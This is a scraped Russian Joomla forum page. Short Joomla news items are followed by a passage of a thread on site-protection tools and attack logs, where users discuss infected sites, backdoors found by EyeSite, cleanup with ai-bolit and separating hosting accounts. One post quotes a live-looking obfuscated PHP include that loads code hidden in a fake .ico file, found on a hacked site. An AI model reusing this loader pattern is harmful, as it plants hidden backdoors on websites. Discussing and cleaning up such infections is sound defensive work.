Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1 ... 18 19 20 21 22 23   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 271198 Просмотров
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #570 : 18.05.2016, 21:08:57 »
А сколько всего сайтов у вас? Если много - они на одном хостинг аккаунте? Какая версия Joomla? Скорее всего надо обновить все до последней версии и удалить вредоносный код. Сканер айболит неплохо справляется с поиском такого кода. Ну и менять пароли. Я на днях тему обновлю. Давно не занимался.
Записан
*

stepan39

  • Захожу иногда
  • 499
  • 28 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #571 : 11.07.2016, 14:57:28 »
EyeSite просигналил:
Новые файлы, всего непринятых изменений: 3
/modules/mod_ariimageslider/_mod_ariimageslider.xml
/modules/mod_ariimageslider/mod_ariimageslider.php
/modules/mod_ariimageslider/mod_ariimageslider.xml

Глядим. Установлен модуль (виден в менеджере расширений). В коде mod_ariimageslider.php зловред в bace64.

Смотрим логи:
Спойлер
[свернуть]

Joomla 2.5.28 с заплатками. JoomShopping 3.20.2, много чего...

Где копнуть?
Записан
*

ice99

  • Захожу иногда
  • 85
  • 3 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #572 : 27.08.2016, 23:16:56 »
Скачал Admin tools 4.0.1 с офсайта. Там почему-то нет кнопки "Права на папки". Неужели и это урезали в пользу платной версии?
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #573 : 27.08.2016, 23:38:58 »
Цитата: ice99 от 27.08.2016, 23:16:56
Скачал Admin tools 4.0.1 с офсайта...
Я ни в коем случае не хочу вас переубеждать, но давайте подумаем вот над каким вопросом. К примеру, я нахожу на вашем сайте уязвимость. Я больше, чем уверен, что она есть. Будь это SQL-Ingect, XSS, просто бекдор в скриптах или что то еще, не важно. Даже если вот прямо сейчас ее нет, у вас самая последняя версия Joomla, самые свежие расширения, все грамотно настроено и дышит в ладан...через какое то время все равно что то отыщется. Теперь вопрос: имея доступ на запись каким образом мне может помешать CHMOD, если я сам простой php-командой могу его устанавливать? На мой взгляд, данное расширение может помочь только от ламера, который, набрав адрес админки и не увидив ее, считает сайт суперкрутозащищенным. Но на деле обычная basic-авторизация оказывается эффективнее, т.к. в этом случае доступ контролируется сервером, а не скриптом. Кроме того, компонент довольно старый...из этого тоже можно сделать какие то выводы...
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #574 : 28.08.2016, 11:21:07 »
Цитата: ice99 от 27.08.2016, 23:16:56
Скачал Admin tools 4.0.1 с офсайта. Там почему-то нет кнопки "Права на папки". Неужели и это урезали в пользу платной версии?

Все есть. У меня ничего не пропало. Скоро обновлю тему нормально. Сделаю пару статей доступных для понимания обычного пользователя.
Записан
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #575 : 25.10.2016, 09:54:38 »
Цитата: wishlight от 18.05.2016, 21:08:57
А сколько всего сайтов у вас? Если много - они на одном хостинг аккаунте? Какая версия Joomla? Скорее всего надо обновить все до последней версии и удалить вредоносный код. Сканер айболит неплохо справляется с поиском такого кода. Ну и менять пароли. Я на днях тему обновлю. Давно не занимался.

У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются, хостеры утверждают что это Joomla дырявая, но последний раз в пустую папку только что созданного пользователя добавились файлы, подскажите, что можно сделать чтоб один раз и навсегда решить проблему, а то регулярно чистить от заразы и менять пароли устал...
Записан
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #576 : 25.10.2016, 10:10:53 »
1. у вас на данный момент 1094 сообщения на форуме. вы до сих пор не знаете, что не нужно одно и тоже писать в 100500 темах?
2. мой вам совет - обратитесь к специалистам в этом вопросе в ком разделе. вы не справитесь сами с этой проблемой.

P.S. пароли кстати можете не менять, толку от этого 0
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #577 : 25.10.2016, 10:19:11 »
Цитата: dmitry_stas от 25.10.2016, 10:10:53
1. у вас на данный момент 1094 сообщения на форуме. вы до сих пор не знаете, что не нужно одно и тоже писать в 100500 темах?
2. мой вам совет - обратитесь к специалистам в этом вопросе в ком разделе. вы не справитесь сами с этой проблемой.

P.S. пароли кстати можете не менять, толку от этого 0
Спасибо. По п.1  - мои извинения - запаниковал :)
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #578 : 25.10.2016, 13:52:45 »
Цитата: nick71 от 25.10.2016, 09:54:38
У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются...
Вы сами на свой вопрос ответили. Не держи яйца в одной корзине - старая народная мудрость!
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #579 : 25.10.2016, 23:20:02 »
Цитата: nick71 от 25.10.2016, 09:54:38
У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются, хостеры утверждают что это Joomla дырявая, но последний раз в пустую папку только что созданного пользователя добавились файлы, подскажите, что можно сделать чтоб один раз и навсегда решить проблему, а то регулярно чистить от заразы и менять пароли устал...
Первое что надо выполнить это разграничение прав по пользователям, что хостинг редко позволяет сделать, тут уж или брать vps и настраивать или один сайт=одному акуанту хостинга.
Записан
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #580 : 03.11.2016, 17:35:32 »
Добрый день, не знаю куда писать, прошу помощи. Создал сайт год назад, поставил защиту скрывать админку ( слово пароль) теперь сайт понадобился но слово забыл, не могу зайти в админку, подскажите как можно зайти. Сайт на компе.
Записан
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #581 : 03.11.2016, 21:19:04 »
Цитата: НИК2016 от 03.11.2016, 17:35:32
Добрый день, не знаю куда писать
само собой в первую попавшуюся тему :)

Цитата: НИК2016 от 03.11.2016, 17:35:32
поставил защиту скрывать админку ( слово пароль)
какую из?
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #582 : 03.11.2016, 21:26:23 »
Цитата: НИК2016 от 03.11.2016, 17:35:32
поставил защиту скрывать админку ( слово пароль) теперь сайт понадобился но слово забыл, не могу зайти в админку, подскажите как можно зайти.

Отключите плагин который закрывает админку в phpMyAdmin. Какой плагин - вам виднее. Только именно его, а не все.

http://joomlaforum.ru/index.php?topic=195334.0
Записан
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #583 : 04.11.2016, 11:51:44 »
попробовал выдает ошибка #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATEbak_tzbq3__extensions SET enabled = 0 WHERE name LIKE '%jlsecure%' AND typ' at line 1
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #584 : 04.11.2016, 12:15:27 »
Попробуйте просто зайти в нужную таблицу и запись и поставить в enabled 0
Записан
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #585 : 04.11.2016, 13:15:39 »
а как узнать нужную таблицу? и как в ней изменить?  я не силен в этом если можно поподробнее, спасибо.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #586 : 04.11.2016, 13:42:44 »
Вот решение на примере плагина JSequre. Ну и дальше эту тему почитайте...
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #587 : 06.08.2017, 12:11:49 »
Может кому будет полезно, логи атак на меня, боты гуляют:

Спойлер
[свернуть]
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #588 : 06.08.2017, 12:17:56 »
Как всегда что попало сканят.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #589 : 06.08.2017, 12:41:32 »
Цитата: wishlight от 06.08.2017, 12:17:56
Как всегда что попало сканят.
И как всегда, где попало, но находят)
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #590 : 02.11.2017, 12:09:29 »
Похоже был массовый взлом джумла 2.5.28. Вряд ли у них патчи стояли, но сейчас много сайтов с 500 ошибкой на форуме на это версии джумла появилось. Так что предупреждаем владельцев сайтов на это версии.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #591 : 08.11.2017, 21:34:17 »
Может кому интересно будет лог атак за октябрь, такое впечатление что в основном скрипткидесы долбились)))

Записан
*

effrit

  • Легенда
  • 10132
  • 1118 / 13
  • effrit.com
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #592 : 08.11.2017, 23:06:34 »
@wishlight, первый пост поломался, где-то в нижних спойлерах что-то пошло не так  ;)
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #593 : 08.11.2017, 23:43:54 »
Цитата: effrit от 08.11.2017, 23:06:34
@wishlight, первый пост поломался

Освобожусь, все переделаю. Его давно пора обновить.
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #594 : 07.12.2017, 23:14:15 »
Обновил весь первый пост. Жду предложений о том, что можно туда добавить. Еще могу сделать и выложить русский для EasyCalcCheck Plus кому лень переводить.  Его более-менее качественного в паблике я не видел.
Записан
*

effrit

  • Легенда
  • 10132
  • 1118 / 13
  • effrit.com
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #595 : 07.12.2017, 23:25:59 »
я бы вот это добавил. вроде нет в шапке таких отдельных компонентов для проверки изменений в файлах.

https://extensions.joomla.org/extensions/extension/access-a-security/site-security/eyesite/

Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #596 : 10.01.2018, 23:19:19 »
Цитата: effrit от 07.12.2017, 23:25:59
я бы вот это добавил.

Добавил. Серверные решения правда проще.
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #597 : 14.02.2018, 15:47:58 »
Версия 2.5.28

Спойлер
[свернуть]

Файлы удалил, появляются снова, меняются CHMOD на файлы index.php  как исправить?
В некоторых создаваемых файлах есть во  такое содержимое
Код
/*d2afa*/

@include "\x2fhome\x2fuser\x73/v/v\x6casno\x7653/d\x6fmain\x73/eas\x79vn.r\x75/ass\x65ts/e\x78port\x2fotdy\x69x-v-\x6bryim\x75/fav\x69con_\x652616\x66.ico";

/*d2afa*/


echo file_get_contents('index.html.bak.bak');
« Последнее редактирование: 14.02.2018, 15:59:24 от Vlasnov »
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #598 : 14.02.2018, 16:07:16 »
Цитата: Vlasnov от 14.02.2018, 15:47:58
Версия 2.5.28

Файлы удалил, появляются снова, меняются CHMOD на файлы index.php  как исправить?
Если сайт не один на хостинге, то отделить этот сайт от других. Установить патч из темы, обновить расширения по возможности до последних версий для 2.5.28. Сменить все пароли, и удалить вредоносный код. Можно с помощью скрипта ai-bolit, но еще нужно понимать что удаляете.
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #599 : 14.02.2018, 16:43:16 »
Цитата: wishlight от 14.02.2018, 16:07:16
Если сайт не один на хостинге, то отделить этот сайт от других. Установить патч из темы, обновить расширения по возможности до последних версий для 2.5.28. Сменить все пароли, и удалить вредоносный код. Можно с помощью скрипта ai-bolit, но еще нужно понимать что удаляете.
айболит не получается запустить даже под виндой, хотя все обновления установлены. Патч из первого поста?
Записан
1 ... 18 19 20 21 22 23   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3826 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 3908 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 3108 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

 Ответов: 0
Просмотров: 1172 		Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 2733 		Последний ответ 03.11.2020, 17:36:03
от Cedars